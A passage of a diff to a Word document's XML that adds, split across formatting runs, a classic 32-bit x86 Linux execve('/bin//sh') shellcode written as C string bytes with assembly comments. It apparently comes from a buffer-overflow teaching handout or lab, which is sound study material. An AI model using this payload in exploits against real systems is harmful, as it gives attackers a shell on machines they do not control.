+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"           </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   $0x68732f2f            */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x68</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">""/bin"           </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   $0x6e69622f            */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x89</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\xe3"             </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>movl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>ebx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">              */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x50</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"                 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                   */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x53</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"                 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>ebx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                   */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x89</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\xe1"             </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>movl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>ecx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">              */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x99</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"                 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>cdql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                           */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>xb0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\x0b"             </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>movb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $0x0b,%al              */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>xcd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\x80"             </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">     $0x80                  */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
-      <w:pgMar w:top="1440" w:right="1440" w:bottom="1368" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
+      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>
